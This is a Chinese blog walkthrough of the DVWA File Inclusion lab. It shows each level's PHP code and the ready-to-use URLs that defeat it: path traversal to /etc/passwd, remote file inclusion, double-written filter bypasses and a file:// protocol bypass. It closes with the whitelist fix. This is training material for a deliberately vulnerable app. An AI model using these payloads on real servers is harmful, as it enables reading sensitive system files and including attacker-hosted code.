File Inclusion

最新推荐文章于 2024-02-19 17:05:48 发布
最新推荐文章于 2024-02-19 17:05:48 发布
阅读量225 收藏
点赞数
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angry_program/article/details/104189656
版权

前言

在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。

详见:  漏洞之文件包含漏洞

下面分别分析四种级别的文件包含漏洞:

 

 

  • Low

服务端核心代码:

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

可以看到,  程序直接调用了page参数传入的文件,  这就到导致了文件包含漏洞。

当我们分别点击页面展示的文件时,   发现参数page也随之变化:

由此可知,  page参数是不可控的,  攻击者可以利用page做恶意攻击。

 

漏洞利用

那我们就可以利用之,  将其包含出服务器下的其他文件:

http://localhost/DVWA/vulnerabilities/fi/index.php?page=/etc/passwd

也可以利用相对路径:

http://localhost/DVWA/vulnerabilities/fi/index.php?page=../../../../../etc/profile

当然了,  也可以进行远程文件包含: 

http://localhost/DVWA/vulnerabilities/fi/index.php?page=http://www.***.com/zb_users/upload/2019/12/201912151576406028214564.jpg

 

 

  • Medium

服务端核心代码:

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

服务端对远程包含(http://)和相对路径的使用(../) 进行了过滤

 

漏洞利用

1. 但是并没有过滤绝对路径, 所以依然可以用绝对路径包含文件

2. 使用str_replace()函数替换是非常不安全的,  它只能替换一次,  并不是把所有符合条件的都替换掉, 攻击者依旧可以用双写绕过替换规则:

http://localhost/DVWA/vulnerabilities/fi/index.php?page=..././..././..././..././..././etc/profile

同样,  对于远程包含漏洞,  也可以用双写绕过替换规则:

http://localhost/DVWA/vulnerabilities/fi/index.php?page=hhttp://ttp://www.***.com/zb_users/upload/2019/12/201912151576406028214564.jpg

 

 

  • High

服务端核心代码:

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
	// This isn't the page we want!
	echo "ERROR: File not found!";
	exit;
}

?>

服务端使用fnmatch()函数进行过滤,  要求page参数的开头必须是file。

 

漏洞利用

虽然参数page必须已file开头,  但是我们依旧可以使用file协议来绕过:

http://localhost/DVWA/vulnerabilities/fi/index.php?page=file:///home/meta/fileHack.txt

 

 

  • Impossible

服务端核心代码:

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
	// This isn't the page we want!
	echo "ERROR: File not found!";
	exit;
}

?>

这里用了白名单过滤..枚举出指定条件, 符合则包含之,  否则过滤之。彻底杜绝了文件包含漏洞。

angry_program
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Skills Assessment - File Inclusion Write Up.pdf
07-21
文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的Web应用程序安全漏洞,它允许攻击者通过操纵输入参数,将恶意的本地文件路径插入到程序中,从而读取或执行服务器上的文件。在本教程中,我们将深入探讨...
edjpgcom(适合用于Local File Inclusion Vulnerability)
12-10
edjpgcom(适合用于Local File Inclusion Vulnerability) edjpgcom可在JPG文件中插入注释, 而不会损坏原来的文件(即插入内容后图片任可浏览), 适合用于Local File Inclusion Vulnerability milw0rm有动画 ...
CTF之SSRF常见绕过
qq_42383069的博客
04-24 1632
ip进制转换:https://tool.520101.com/wangluo/jinzhizhuanhuan。当程序中限制了我们使用localhost和127.0.0.1时,便可以利用进制转换来绕过。进制转换:https://www.sojson.com/hexconvert.html。
localhost绕过方法
最新发布
asmartrman的博客
02-19 411
localhost绕过方法
SSRF(服务器端请求伪造)
qq_56289291的博客
08-02 1630
服务器端请求伪造(SSRFServer-SideRequestForgery)是一个Web安全漏洞,指攻击者诱导服务器将HTTP请求发送到攻击者选择的一个目标上。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。例如通过127.0.0.1就能访问本机,192.168.*.*就能访问内网C段。...
SSRF服务器端请求伪造攻击详解
m0_51468027的博客
02-07 6025
一、SSRF概述   SSRF(Server-Side Request Forgery:服务器端请求伪造),是一种由攻击者构造请求,由服务端发起请求的安全漏洞。   其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据   数据流:攻击者----->服务器----->目标地址   根据后台使用函数的不同,对应的影响和利用方法又有不一样   PHP中下面函数的使用不
渗透测试中的小tips
LiBai'S BLOG
11-03 2672
1、如果提示缺少参数,如{msg:params error},可尝使用字典模糊测试构造参数,进一步攻击。 2、程序溢出,int最大值为2147483647,可尝试使用该值进行整数溢出,观察现象。 3、403,404响应不灰心,尝试使用dirsearch等工具探测目录。 4、验证码简单绕过:重复使用,万能验证码(0000,8888),空验证码,验证码可识别(可用PKAV HTTP Fuzzer工具识别等) 5、短信轰炸绕过:手机号前加+86有可能会绕过,手机号输入邮箱,邮箱处输入手机号 6、如果验证码有实效,
Remote-File-Inclusion-Attacks.rar_网络编程_Unix_Linux_
08-11
this doc talk about how to attack a network system remotly very good document in how to learn hackers mechanism and protect your networks againts hacking
tryhackme-writeups:我对TryHackMe机器的笔记
03-08
【标题】:“TryHackMe-Writeups:对TryHackMe平台机器的学习笔记” 【描述】:“TryHackMe是一个在线学习平台,专注于网络安全和渗透测试。这个压缩包包含了我在尝试并解决TryHackMe上的各种虚拟机时所记录的笔记...
Web中常见的绕过和技巧
devil8123665的博客
10-15 1101
参考文献Web中常见的绕过和技巧 - mrhonest - 博客园 SQL注入 十六进制绕过引号 slect table_name from information_schema.table where table_schema="sqli"; slect table_name from information_schema.table where table_schema=0x73716c69; slect table_name from information_.
绕过后台登录,输入地址直接访问资源
热门推荐
SupperDrummer的博客
07-31 1万+
后台管理页面里 如果我们想要访问某个页面一定要先登录, 有了权限之后才能访问里面的资源。 有时候需要补登录 直接就访问这个页面  其实很简单 只要设置一下权限就好了  第一。在一个名为applicationContext-security-xml   (也可能是别的名字 但是后面应该是这个 secryity)里  加两句话 请看图 在本地的时候  l
DVWA靶场
nidaxin的博客
01-20 490
1.command injection(medium) 过滤了“&&”和“;",可以想办法绕过,可以用“&”,操作和low一样, 输入:127.0.0.1&ipconfig[若输入&&,可看见是过滤了&&的] <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Set black
【每天学习一点新知识】今天谈谈SSRF
RexHa的博客
10-23 799
SSRF (Server-Side Request Forgery) 即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击,,借由服务端为跳板来攻击目标系统。1:内外网的端口和服务扫描2:主机本地敏感数据的读取,利用file、gopher、dict协议读取本地文件、执行命令等3: DOS攻击,请求大文件,始终保持连接Keep-Alive Always。
SSRF漏洞原理学习
weixin_44843084的博客
05-05 306
SSRF漏洞原理学习 定义 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 漏洞原理 利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。 服务端提供了从其他服务...
pikachu之文件包含漏洞
weixin_51446936的博客
06-09 2141
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
UEFI-dsc.dec.fdf文件
m0_49918601的博客
09-10 701
UEFI-dsc.dec.fdf文件   上一篇介绍了 .inf文件, .inf文件相当于Visual Studio中的工程文件。而 .dsc(Platform Description File)则相当于Visual Studio中的 solution 文件。每个包都要包含一个.dec(Package Declaration File)文件、一个 .dsc文件。如果这个包还用于固件Iamge或Option Rom Image的生成,则还需要添加 .fdf(Flash Description File)文件.
记一次cmsv9修改为https协议访问
nouswait的博客
08-17 527
方法:修改网站根目录下的.htaccess,增加: RewriteEngine On RewriteCond %{SERVER_PORT} 80 RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L] 或者: RewriteEngine On RewriteCond %{HTTPS} !=on RewriteRule ^(.*) https://%{SERVER_NAME}/$1 [R=301,L] 修改完以后网址会自动重定向,这时我发现我的搜索页面
dvwa file inclusionfile upload
05-12
其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值